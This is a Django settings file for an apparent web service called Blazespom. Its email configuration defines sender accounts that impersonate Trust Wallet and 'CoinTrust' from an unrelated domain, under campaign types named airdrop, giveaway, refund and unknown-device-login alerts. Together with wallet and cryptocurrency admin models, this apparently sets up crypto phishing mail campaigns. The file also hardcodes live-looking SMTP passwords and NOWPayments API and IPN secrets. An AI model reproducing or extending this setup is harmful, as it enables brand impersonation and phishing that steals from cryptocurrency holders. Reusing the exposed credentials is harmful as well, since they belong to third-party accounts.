"""
Django settings for xolo project.

Generated by 'django-admin startproject' using Django 4.2.

For more information on this file, see
https://docs.djangoproject.com/en/4.2/topics/settings/

For the full list of settings and their values, see
https://docs.djangoproject.com/en/4.2/ref/settings/
"""

from pathlib import Path
import os
from dotenv import load_dotenv

# Load environment variables
load_dotenv()

# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent

# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/4.2/howto/deployment/checklist/

# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = os.getenv('SECRET_KEY')
AUTH_USER_MODEL = 'account.User'

# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*', 'https://blazespom.onrender.com', 'https://blazespom.com']

CSRF_TRUSTED_ORIGINS = ['https://blazespom.onrender.com', 'https://blazespom.com']

# Application definition

INSTALLED_APPS = [
    'account',
    'core',
    'jazzmin',
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    'django.contrib.staticfiles',
]

MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'whitenoise.middleware.WhiteNoiseMiddleware',  # 
    'django.contrib.sessions.middleware.SessionMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]

ROOT_URLCONF = 'xolo.urls'

TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(BASE_DIR, 'templates')],
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]

WSGI_APPLICATION = 'xolo.wsgi.application'

# Database configuration - using SQLite3
DATABASES = {
    'default': {
        'ENGINE': os.getenv('DB_ENGINE'),
        'NAME': os.getenv('DB_NAME'),
        'USER': os.getenv('DB_USER'),
        'PASSWORD': os.getenv('DB_PASSWORD'),
        'HOST': os.getenv('DB_HOST'),
        'PORT': os.getenv('DB_PORT'),
        'OPTIONS': {
            'sslmode': 'require'
        },
        'CONN_MAX_AGE': 600,
    }
}


# Password validation
# https://docs.djangoproject.com/en/4.2/ref/settings/#auth-password-validators

AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME':
        'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME':
        'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME':
        'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME':
        'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]

# Internationalization
# https://docs.djangoproject.com/en/4.2/topics/i18n/

LANGUAGE_CODE = 'en-us'

TIME_ZONE = 'UTC'

USE_I18N = True

USE_TZ = True

# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/4.2/howto/static-files/

STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles')

STATICFILES_DIRS = [
    os.path.join(BASE_DIR,'static'),
]

STATICFILES_FINDERS = (
    'django.contrib.staticfiles.finders.FileSystemFinder',
    'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)

STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'

# Media files configuration
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')

# Default primary key field type
# https://docs.djangoproject.com/en/4.2/ref/settings/#default-auto-field

DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'

# settings.py
EMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'

EMAIL_HOST = os.getenv('EMAIL_HOST')
EMAIL_PORT = os.getenv('EMAIL_PORT')
EMAIL_USE_SSL = os.getenv('EMAIL_USE_SSL') == 'True'
EMAIL_HOST_USER = os.getenv('EMAIL_HOST_USER')
EMAIL_HOST_PASSWORD = os.getenv('EMAIL_HOST_PASSWORD')
DEFAULT_FROM_EMAIL = f'Blazespom <{os.getenv("EMAIL_HOST_USER")}>'

EMAIL_TIMEOUT = 60

CAMPAIGN_EMAIL_BACKENDS = {
    'AIRDROP': {
        'EMAIL_HOST': 'smtp.hostinger.com',
        'EMAIL_PORT': '465',
        'EMAIL_HOST_USER': 'Airdrop <mail@notifytxx.com>',
        'EMAIL_HOST_PASSWORD': 'ZnfuK5m&',
        'EMAIL_USE_SSL': 'True',
    },
    'GIVEAWAY': {
        'EMAIL_HOST': 'smtp.hostinger.com',
        'EMAIL_PORT': '465',
        'EMAIL_HOST_USER': 'Trust Wallet <notifications@notifytxx.com>',
        'EMAIL_HOST_PASSWORD': '6WpL0by?',
        'EMAIL_USE_SSL': 'True',
    },
    'REFUND': {
        'EMAIL_HOST': 'smtp.hostinger.com',
        'EMAIL_PORT': '465',
        'EMAIL_HOST_USER': 'CoinTrust <service@notifytxx.com>',
        'EMAIL_HOST_PASSWORD': '@C5mXq4Uy',
        'EMAIL_USE_SSL': 'True',
    },
    'UNKNOWN DEVICE LOGIN': {
        'EMAIL_HOST': 'smtp.hostinger.com',
        'EMAIL_PORT': '465',
        'EMAIL_HOST_USER': 'CoinTrust <alert@notifytxx.com>',
        'EMAIL_HOST_PASSWORD': 'KrYglsP[8]cG',
        'EMAIL_USE_SSL': 'True',
    },
}

#JAZZMIN SETUP
# Jazzmin Settings
JAZZMIN_SETTINGS = {
    "site_title": "Blazespom Admin",
    "site_header": "Blazespom",
    "site_brand": "Blazespom",
    "site_logo": None,
    "welcome_sign": "Welcome to Blazespom Admin",
    "copyright": "Blazespom",
    "search_model": ["auth.User", "core.Campaign"],
    "user_avatar": None,
    "show_sidebar": True,
    "navigation_expanded": True,
    "order_with_respect_to": ["auth", "core"],
    "icons": {
        "auth": "fas fa-users-cog",
        "core.campaign": "fas fa-envelope",
        "core.cryptocurrency": "fas fa-coins",
        "core.wallet": "fas fa-wallet",
    },
}

# Define base URL for the site
BASE_URL = 'https://blazespom.com' if not DEBUG else 'http://localhost:8000'

# NOWPayments Settings
NOWPAYMENTS_API_KEY = 'V273MFM-87JMBCG-KA0V1KT-5836EJA'
NOWPAYMENTS_IPN_SECRET_KEY = '8typN6jAEU5pTVZBxhno5vBzW5ePHrwc'
NOWPAYMENTS_IPN_CALLBACK_URL = f'{BASE_URL}/api/crypto/ipn-callback/'
NOWPAYMENTS_SUCCESS_URL = f'{BASE_URL}/account/crypto-payment/success/'
NOWPAYMENTS_CANCEL_URL = f'{BASE_URL}/account/crypto-payment/cancel/'